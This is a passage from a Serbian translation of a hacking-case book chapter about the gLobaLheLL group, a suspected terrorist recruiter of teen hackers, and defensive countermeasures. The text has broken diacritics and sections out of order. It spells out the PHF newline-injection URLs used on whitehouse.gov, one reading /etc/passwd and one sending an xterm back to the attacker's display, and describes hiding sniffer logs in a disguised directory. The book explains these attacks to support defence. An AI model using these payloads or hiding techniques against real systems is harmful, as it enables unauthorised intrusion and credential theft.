Posledice Kako se desilo da je administrator sistema tako rano ujutro poåeo da çuãka? Zyklon se nimalo ne dvoumi oko odgovora. Kada su tuæioci sakupili dokumente za ovaj sluåaj, pronaãao je izjavu da su informacije koje su vodile do saznaça vezanih za upad grupe gLobaLheLL u prezentaciju Bele kuñe, dobijene od douãnika FBI-ja. Koliko se on seña, u dokumentu je pisalo i da se taj douãnik nalazio u Nju Delhiju, u Indiji. Po Zyklonovom miãàeçu, nije bilo nikakve sumçe. Jedina osoba kojoj je rekao za upad u Belu kuñu – jedina osoba – bio je Kalid Ibrahim. Jedan plus jedan jesu dva: Kalid je bio douãnik FBI. Ali misterija ostaje. Åak i ako je Zyklon u pravu, da li je to cela priåa? Kalid je bio douãnik, pomagao je FBI-ju da pronaœe klince hakere koji su bili raspoloæeni da upadaju na osetàive prezentacije? Ili moæda postoji joã jedno moguñe objaãçeçe: da je çegova uloga douãnika bila samo pola priåe, a da je on zapravo bio i pakistanski terorista, kao ãto je mislio indijski general. Åovek koji igra dvostruku ulogu: pomaæe interesima Talibana dok je infiltriran u FBI. Njegov strah da ñe ga neki klinac prijaviti FBI-ju uklapa se u ovu verziju priåe.


Meœutim, åaånuli su u osiçe gnezdo. Oko dve nedeàe kasnije, FBI se ustremio na sve ålanove grupe gLobaLheLL koje su mogli da identifikuju. Pored Zyklona – tada je imao 19 godina i uhapãen je u dræavi Vaãington – uhapãeni su i MostHateD (Patrik Gregori, takoœe 19 godina, iz Teksasa), MidPhasr (Åad Dejvis iz Viskonsina), i drugi. ne0h je bio meœu par hakera koji su preæiveli napad. Sa bezbedne udaàene lokacije on je, razjaren, postavio stranu na Web prezentaciju sa prkosnom porukom. Ona je u prvom trenutku glasila: “Sluãajte vi gadovi iz FBI. Ne z_ se s naãim ålanovima jer ñete izgubiti. Dok ovo piãem mi dræimo fbi.gov. UPLAÃILI STE SE. Uhapãeni smo jer vaãi glupi idioti ne mogu da ukapiraju ko je upo u belu kuñu... jel tako? pa ste nas sve uñorkirali da vidite jel ñe neko da ga otkuca. PUNO J_ SREÑE. MI NISMO CINKAROÃI. Kapirate? REKAO SAM DOMINACIJA SVETOM.” I potpisao je: “Nemilosrdni ne0h.”9

Samo nekoliko àudi zna istinu. Pitaçe je da li su meœu çima i agenti FBI i federalni tuæioci koji su ukàuåeni u sluåaj. Ili su i oni nasamareni? Na kraju, Patrik Gregori i Åad Dejvis osuœeni su na dvadeset ãest meseci, a Zyklon Barns na petnaest. Sva trojica su odsluæila kazne i viãe nisu u zatvoru.

Pet godina kasnije

Umeñe provale

44

Dani hakerisaça su za Comradea uglavnom samo señaçe, ali çegov glas æivne kada govori o “uzbuœeçu zbog sr_ koja ne biste smeli da pravite, odlaska na mesta na kojima ne biste smeli da budete, nadajuñi se da ñete naiñi na neãto kul”. Ipak, vreme je da se poåne sa æivotom. On kaæe da razmiãàa o fakultetu. Kada smo razgovarali, upravo se vratio iz skautske ãkole u Izraelu. Jezik mu nije bio prevelik problem – uåio je hebrejski u osnovnoj ãkoli i iznenadio se koliko je mnogo zapamtio. Njegovi utisci o toj zemài su pomeãani. Devojke su bile “baã super”, a Izraelci su pokazali da veoma vole Ameriku. “Åini se da se ugledaju na Amerikance.” Na primer, provodio je vreme s nekim Izraelcima koji su pili sok RC Cola za koji nikada nije åuo, a ispostavilo se da se pravi u Americi. Izraelci su objasnili: “To je ono ãto Amerikanci piju u reklamama”. Nailazio je i na “antiameriåke stavove àudi koji se ne slaæu sa ameriåkom politikom”, ali to ga nije omelo: “Pretpostavàam da toga ima svuda.” Vreme mu se nimalo nije dopalo – bilo je “hladno i kiãovito” dok je bio tamo. A onda, bio je tu i problem s raåunarima. Zbog puta je kupio prenosivi raåunar i beæiånu mreænu karticu, ali je otkrio da su “zgrade napravàene od ogromnog kameça”. Njegov raåunar je mogao da vidi pet ili deset mreæa, ali su signali bili previãe slabi za povezivaçe i morao je da peãaåi dvadeset minuta da bi doãao do mesta na kom se moæe prijaviti na mreæu. Comrade je sada u Majamiju. Tinejdæer s dosijeom prestupnika sada æivi od nasledstva i pokuãava da odluåi da li ñe iñi na fakultet. Ima dvadeset godina i uglavnom ne radi niãta. Comradeov drugar ne0h radi za veliku telekomunikacionu kompaniju (kaæe da posao s radnim vremenom od devet do pet “nije dobar”), ali ñe uskoro otiñi u Los Anœeles na tri meseca fiziåkog rada jer plañaju

mnogo viãe nego ãto sada zaraœuje. Nada se da ñe, kao i veñina obiånih àudi, uspeti da uãtedi dovoàno za otplañivaçe kuñe u kojoj trenutno æivi. Kada se tromeseåni, dobro plañen posao zavrãi, i ne0h razmiãàa o studiraçu – ali ne planira da studira raåunarske nauke. “Veñina àudi s takvim diplomama koje sam sreo nema pojma”, rekao je. Umesto toga, on bi voleo da studira poslovni i organizacioni menadæment, a onda da se raåunarima bavi na poslovnom nivou. Govoreñi o svojim ranijim avanturama, on ponovo pomiçe svoju okupiranost Kevinom. Do koje mere je zamiãàao da ide mojim stopama?

Koliko je pretça velika Kombinacija odluånih terorista i neustraãivih klinaca hakera mogla bi biti katastrofalna za Ameriku. Ova priåa me je naterala da se zapitam koliko drugih Kalida regrutuje klince (ili nepatriotski nastrojene odrasle sa hakerskim sposobnostima), gladne novca, priznaça ili zadovoàstva za uspeãno obavàene teãke zadatke. Vrbovnici posle Kalida moæda ñe biti tajanstveniji i neñe se moñi tako lako otkriti. Kada sam bio u pritvoru pre suœeça, nekoliko puta mi je prilazio kolumbijski kraà droge. Sledovala mu je doæivotna robija u federalnom zatvoru bez moguñnosti uslovne kazne. Ponudio mi je primamàiv posao: platiñe mi 5 miliona dolara u gotovom za upad u “Sentry” – raåunarski sistem Federalnog biroa za zatvore – i çegovo oslobaœaçe iz zatvora. Taj tip je bio stvaran i smrtno ozbiàan. Nisam prihvatio çegovu ponudu, ali sam ostavio utisak da ñu mu pomoñi kako bih izbegao sukob. Pitam se ãta bi ne0h uradio u sliånoj situaciji. Ameriåki neprijateài moæda treniraju svoje vojnike za kompjutersko ratovaçe kojim bi napali ameriåku infrastrukturu i odbranili svoju. Ne morate biti mudrac da biste shvatili da takve grupe mogu angaæovati umeãne hakere iz bilo kog dela sveta radi obuke, ili za projekte koji su bitni za misije.


Da li sam æeleo da budem uhvañen? I jesam i nisam. Ako me uhvate, to bi bio dokaz da “mogu to da uradim i da sam to uradio”. Nije baã da sam namerno hteo da me uhvate. Hteo sam da me uhvate da bih se borio, oslobodio i onda bio haker koji je umakao. Izaãao bih, naãao dobar posao u nekoj vladinoj agenciji i uklopio bih se s podzemàem.

Umeñe provale

46

Godine 1997. i ponovo 2003, Ministarstvo odbrane je pokrenulo operaciju Eligible Receiver – pokuãaj da se proveri osetàivost nacije na elektronski napad. U ålanku Washington Timesa10 o ranijem ovakvom pokuãaju, objavàeno je: “Viãi rukovodioci Pentagona bili su zapaçeni vojnom veæbom koja je pokazala koliko je hakerima lako da obogaàe ameriåke vojne i civilne raåunarske mreæe”. Ålanak objaãçava da je Agencija za nacionalnu bezbednost okupila grupu svojih specijalista za raåunare u “crveni tim” hakera i omoguñila im da koriste samo raåunarsku opremu koja je dostupna i javnosti, i sve alate za hakerisaçe, ukàuåujuñi kôd za zloupotrebe koji su mogli preuzeti sa Interneta ili elektronskih oglasnih tabli. Za nekoliko dana, hakeri iz crvenog tima infiltrirali su se u raåunarske sisteme za upravàaçe delovima nacionalne elektrodistribucijske mreæe i pomoñu nekoliko komandi mogli su da zamraåe åitave delove zemàe. “Da ovo nije bila veæba”, objavio je Christian Science Monitor, “oni su mogli da poremete sistem komunikacije Ministarstva odbrane (i preuzmu najveñi deo Pacifiåke komande) i pristupe raåunarskim sistemima na brodovima ameriåke mornarice.”11 Liåno sam mogao da pobedim bezbednosne mehanizme telefonskih centrala napravàenim u kompaniji Baby Bells i kontroliãem pristup tim centralama. Pre deset godina imao sam potpunu kontrolu nad veñinom centrala koje su odræavale kompanije Pacific Bell, Sprint, GTE i druge. Zamislite haos koji bi snalaæàiva grupa terorista mogla da napravi kada bi imala takav pristup. Ålanovi organizacije Al Kaida i drugih teroristiåkih grupa i ranije su koristile raåunarske mreæe pri planiraçu teroristiåkih napada. Postoje dokazi da su teroristi koristili Internet prilikom planiraça operacija za napade 11. septembra. Ako je Kalid Ibrahim i bio uspeãan u dobijaçu informacija preko pomenutih hakera, to niko ne obelodaçuje. Nedostaje konaåan dokaz da je on zaista bio povezan s napadima na Svetski trgovinski centar i Pentagon. Ipak, niko ne zna da li ñe se on ili neko sliåan ponovo pojaviti na kibernetiåkoj sceni, traæeñi naivne pomagaåe koje uzbuœuje “pravàeçe sr_ koja ne biste smeli da pravite, odlazak na mesta na kojima ne biste smeli da budete”. Klince koji bi mogli pomisliti da je ponuœeni izazov “kul”.

Za mlade hakere, slaba bezbednost ostaje neprekidan podsticaj. Pa ipak, hakeri iz ove priåe trebalo je da prepoznaju opasnost kada ih je strani dræavàanin regrutovao za kompromitovaçe osetàivih ameriåkih raåunarskih mreæa. Moram se zapitati koliko ñe drugih mladiña kao ãto je ne0h neprijateà regrutovati. U svetu punom terorista, dobra bezbednost nikada nije bila toliko bitna kao danas.

SAÆETAK 47 Poglavlje 2: Kad teroristi pozovu

ne0h nam je dao detaàe o naåinu na koji je upao u raåunarski sistem Lockheed Martina. Priåa je svedoåanstvo o inovativnosti hakera (“Ako u bezbednosti postoji rupa, mi ñemo je pronañi” mogao bi biti hakerski moto), ali i upozoreçe za svaku organizaciju. ne0h je brzo utvrdio da Lockheed Martin ima sopstveni server za prevoœeçe imena domena (engl. Domain Name Servers, DNS). DNS je Internet protokol koji, na primer, www.disney.com prevodi u 198.187.189.55, adresu koja se moæe koristiti za usmeravaçe paketa s porukama. ne0h je znao da je grupa za istraæivaçe bezbednosti u Poàskoj objavila ono ãto hakeri nazivaju “exploit” – program koji je dizajniran tako da napadne jedan konkretan raçiv deo – da iskoristi slabost u verziji DNS-a kompanije Lockheed. Kompanija je koristila DNS protokol pod imenom BIND (Berkeley Internet Name Domain). Poàska grupa je otkrila da je jedna verzija BIND-a slaba kada napad ukàuåuje “prelivaçe udaàenog bafera” (engl. remote buffer overflow), a upravo tu verziju imala je kompanija Lockheed Martin. Prateñi metodu koju je pronaãao na Internetu, ne0h je mogao da doœe do administratorskih privilegija i na primarnom i na sekundarnom DNS serveru Lockheeda. Posle zauzimaça administratorskog naloga, ne0h je podesio presretaçe lozinki i e-poãte instalirajuñi program za çuãkaçe. U tajnosti je hvatao sav saobrañaj. Podatke koje treba uskladiãtiti, haker obiåno ãaàe na mesto gde je mala verovatnoña da ñe biti primeñeni. Da bi sakrio dnevnik prisluãkivaça, ne0h je napravio direktorijum sa imenom koje je bilo samo razmak, predstavàen s tri taåke. Prava putaça koja je koriãñena bila je “/var/adm/ ...” Tokom inspekcije administrator sistema mogao je lako da previdi ovu bezopasnu stavku.

Umeñe provale

48

Tehnika sakrivaça programa za çuãkaçe, mada je u mnogim situacijama efikasna, priliåno je jednostavna. Za prikrivaçe hakerskih tragova u ovakvim situacijama postoje i prefiçenije metode. Pre nego ãto je otkrio da li ñe moñi dubàe da prodre u mreæu Lockheed Martina kako bi doãao do poveràivih informacija, ne0h je obratio paæçu na drugi zadatak, pa su osetàive datoteke kompanije ostale bezbedne. Za upad u Belu kuñu, Zyklon kaæe da je prvo pokrenuo program CGI Scanner koji pregleda ciàni sistem traæeñi slabosti standardnog interfejsa za prenos. Otkrio je da je Web prezentacija podloæna napadu pomoñu “zloupotrebe PHF-a”. Ona koristi greãku koju je napravio programer PHF skripta (telefonskog imenika). PHF je okruæeçe zasnovano na obrascima. Ono prihvata ime kao unos i na serveru traæi podatke o imenu i adresi. Skript poziva funkciju escape_shell_cmd(), koja bi trebalo da oåisti unos od sumçivih znakova. Ali, programer je sa liste izostavio jedan znak – znak za novi red. Vrstan napadaå mogao bi iskoristiti taj previd tako ãto ñe unos postaviti u obrazac koji sadræi ãifrovanu verziju (0x0a) znaka za novi red. Slaçe znakovnog niza sa ovim znakom prevariñe skript tako da izvrãi svaku komandu koju napadaå odabere. Zyklon je u svoj åitaå Weba uneo URL http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/bin/ cat%20/etc/passwd

Tako je mogao da prikaæe datoteku s lozinkama za whitehouse.gov. Meœutim, on je hteo potpunu kontrolu nad Web serverom Bele kuñe. Gotovo sigurno je znao da ñe ulazi X Servera biti blokirani zaãtitnom barijerom, te da neñe moñi da se poveæe ni sa jednim od tih servisa na prezentaciji whitehouse.gov. Zato je ponovo iskoristio rupu u PHF-u tako ãto je uneo: http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/usr/X11R6/ bin/xterm%20-ut%20-display%20zyklons.ip.address:0.0

Tako je terminalski emulator xterm poslat sa servera Bele kuñe na raåunar koji je on kontrolisao i na kom je radio X server. Drugim reåima, umesto da se poveæe sa whitehouse.gov, on je sistemu Bele kuñe naredio da se poveæe sa çim. (To je moguñe samo kada barijera dozvoàava izlazne veze, ãto je ovde oåigledno bio sluåaj.)

Potom je iskoristio slabost prelivaça bafera u programu sistema – ufsrestore. Zyklon kaæe da mu je to omoguñilo da zadobije administratorska prava na prezentaciji whitehouse.gov, i pristup serveru za poãtu Bele kuñe i ostalim sistemima na mreæi.

PROTIVMERE


Opisane zloupotrebe koje su pravili ne0h i Comrade pred sve kompanije postavàaju dva problema. Prvi je jednostavan i opãte poznat: informisaçe o svim najnovijim izdaçima operativnog sistema i programa. Izuzetno je vaæno biti u toku i instalirati bezbednosne zakrpe ili ispravke. Da biste bili sigurni da se to ne radi nasumice, trebalo bi da osmislite i sprovodite program aæuriraça åiji bi cià bio upozoravaçe odgovarajuñeg osobàa åim se pojavi nova dopuna proizvoda koje kompanija koristi – naroåito operativnog sistema, ali i aplikacionog softvera i firmvera. Kada nova zakrpa postane dostupna, ona se mora ãto pre instalirati – odmah, ili åim bude moguñe. Nije teãko razumeti premorene zaposlene koji su pod stalnim pritiskom obavàaça obiånih zadataka (instaliraçe sistema za nove radnike, na primer) i instaliraça zakrpa u dogledno vreme. Meœutim, ukoliko je ureœaj s nepotpunim softverom dostupan preko Interneta, nastaje veoma riziåna situacija. Brojni sistemi su ugroæeni zbog neredovnog aæuriraça. Åim se neka slabost objavi, prozor izloæenosti je maksimalno otvoren sve dok proizvoœaå ne objavi zakrpu koja ñe popraviti problem, i dok je korisnici ne instaliraju. Vaãa organizacija treba tom zadatku da dâ visok prioritet. Mora postojati zvaniåan program upravàaça zakrpama koji smaçuje izloæenost ãto je moguñe bræe, ali tako da se ne ometaju osnovne operacije poslovaça. Ipak, åak i ako redovno instalirate zakrpe, to nije dovoàno. ne0h kaæe da su neki upadi u kojima je uåestvovao bili zloupotrebe “nultog dana” (engl. zero day) – upadi zasnovani na slabosti koja je poznata samo u okviru male grupe hakera. “Nulti dan” je dan kada prvi put iskoriste tu slabost, a to je ujedno i dan kada proizvoœaå i àudi koji se bave bezbednoãñu saznaju za çu.

Umeñe provale

50

Poãto uvek postoji moguñnost takvih upada, svaka organizacija koja koristi loã proizvod raçiva je sve dok se ne objavi zakrpa ili zaobilazno reãeçe. Kako da smaçite rizik od takve izloæenosti? Verujemo da je jedino vredno reãeçe koriãñeçe modela “dubinske odbrane”. Moramo pretpostaviti da ñe naãi raåunarski sistemi koji su dostupni javnosti u nekom trenutku biti raçivi na nulti dan. Zbog toga treba da stvorimo okruæeçe za smaçivaçe potencijalne ãtete koju loãi momci mogu da naprave. Jedan primer, koji smo ranije pomenuli, jeste postavàaçe javno dostupnih sistema u “DMZ” zaãtitne barijere kompanije. Termin DMZ je pozajmàen iz vojnopolitiåke skrañenice za “demilitarizovanu zonu” i odnosi se na podeãavaçe arhitekture mreæe tako da sistemi koji su dostupni javnosti (Web serveri, serveri e-poãte, DNS serveri i sliåno) budu izolovani od osetàivih sistema u mreæi kompanije. Primeçivaçe arhitekture koja ãtiti unutraãçu mreæu jedan je primer “dubinske odbrane”. Takvim rasporedom, åak i ako hakeri otkriju dotad nepoznatu slabost i dospeju do Web servera ili servera e-poãte, korporativni sistemi u unutraãçoj mreæi i daàe ñe biti zaãtiñeni dodatnim bezbednosnim slojem. Kompanije mogu organizovati joã jednu efikasnu protivmeru prañeçem mreæe ili pojedinaånih matiånih raåunara u potrazi za neuobiåajenim ili sumçivim aktivnostima. Napadaå obiåno izvodi odreœene akcije kada uspeãno upadne u sistem – na primer, pokuãava da doœe do ãifrovanih ili obiånih tekstualnih lozinki, instalira zadça vrata, meça konfiguraciju datoteka kako bi oslabio bezbednost, ili meça sistemske, programske ili dnevniåke datoteke. Prañeçem tih vrsta uobiåajenog hakerskog ponaãaça i uzbuçivaçem odgovarajuñeg osobàa, lakãe ñete kontrolisati ãtetu. Drugo: nebrojeno puta su me novinari pitali koji je najboài naåin zaãtite poslovnog ili liånog raåunara u danaãçem neprijateàskom okruæeçu. Jedna od osnovnih preporuka jeste koriãñeçe jaåeg vida identifikovaça umesto statiånih lozinki. Nikada neñete znati, osim moæda kada sve bude gotovo, da li neko drugi zna koja je vaãa lozinka. Uz tradicionalne lozinke moæete koristiti brojne tehnike prijavàivaça na drugom nivou, koje omoguñavaju mnogo veñu sigurnost. Pored ranije pomenutog RSA SecureID-a, Safeword PremierAccess nudi æetone za generisaçe lozinke, digitalne sertifikate, smart kartice, biometriku i druge tehnologije.

Nedostaci ove vrste kontrolisaça identiteta jesu dodatni troãkovi i neprijatnosti za svakog korisnika. Sve zavisi od toga ãta pokuãavate da zaãtitite. Statiåne lozinke su moæda dovoàne za zaãtitu novih ålanaka Web prezentacije LA Timesa. Ali, da li se na çih moæete osloniti kada treba da zaãtitite specifikacije dizajna novog putniåkog mlaznog aviona?

ZAKLJUÅAK

NAPOMENE 1. “Do Terrorists Troll the Net?”, Niall McKay, wired.com, 14. novembar, 1998. 2. Makajev ålanak, op. cit. 3. Makajev ålanak, op. cit. 4. Sa Web prezentacije satp.org, South Asia Intelligence Review. 5. “The United States and the Global Coalition Against Terrorism, SeptemberDecember 2001: A Chronology”, http://www.state.gov/r/pa/ho/pubs/fs/ 5889.htm. 6. Obrañaçe general-majora Yashwanta Devaa, Avsm (Retd), President lete, na temu “Information Security” u Indijskom meœunarodnom centru (India International Centre), Nju Delhi, 6. april 2002, strana 9.


Priåe u ovoj kçizi ali i novinski ålanci, prikazuju koliko su ameriåki raåunarski sistemi, a i sama nacija, podloæni napadu. Åini se da je veoma malo sistema zaista bezbedno. U eri terorizma, jasno je da se rupe moraju boàe krpiti. Epizode kao ãto je ova, pokreñu pitaçe s kojim se moramo suoåiti: koliko lako se talenat i znaje nesavesnih tinejdæera mogu okrenuti protiv nas i ugroziti ameriåko druãtvo. Verujem da se joã u osnovnoj ãkoli – åim se œaci susretnu sa informatikom – mora uåiti o principima raåunarske etike. Nedavno sam prisustvovao prezentaciji Frenka Abignejla, protagoniste filma Uhvati me ako moæeã (Catch Me If You Can). Frenk je sproveo istraæivaçe o etiåkoj upotrebi raåunara meœu uåenicima sredçih ãkola ãirom zemàe. Svaki uåenik je bio upitan da li je provaàivaçe lozinke ãkolskog druga prihvatàivo ponaãaçe. Iznenaœuje da åak åetrdeset osam procenata ispitanih studenata smatra da je to u redu. S takvim stavovima nije teãko shvatiti zaãto àudi uåestvuju u ovakvim aktivnostima. Ukoliko neko ima predlog kako da mladi hakeri budu maçe podloæni regrutovaçu od strane neprijateàa, domañih i stranih, bilo bi dobro da nam saopãti svoje ideje.

Umeñe provale

52

7. Ovo je teãko potvrditi. Poãto se napad dogodio za vreme Klintonove administracije, nijedna od navedenih osoba viãe ne radi u Beloj kuñi. Ali dostupno je nekoliko sitnica. Monti Hejms je pravio video-snimak. Kristofer Adams je ime reportera britanskog åasopisa Financial Times; koliko nam je poznato, u Beloj kuñi nije bilo zaposlenog s tim imenom. Debra Rid je fotograf Associated Pressa. Nismo pronaãli nikoga sa imenom Koni Kolabatisto ko je radio u Beloj kuñi. Æena s tim imenom udata je (ili je bila u to vreme) za Dæina Kolabatista, koji je bio predsednik odeàeça Solutions u kompaniji Space Imaging, ali nema oåigledne veze izmeœu çih i tima u Beloj kuñi. 8. http://www.attrition.org/mirror/attrition/1999/05/10/www.whitehouse.gov/mirror.html. 9. I ovde je teãko proveriti verodostojnost. Ipak, tekst koji je naveden moæe se videti na lokaciji http://www.attrition.org/mirror/attrition/1999/05/26/ mmic.snu.ac.kr/. 10. “Computer Hackers Could Disable Military; System Compromised in Secret Exercise”, Bil Gerc, Washington Times, 16. april, 1998. 11. “Wars of the Future... Today”, Tom Regan, Christian Science Monitor, 24. jun, 1999.

Umece provale

Recommend Documents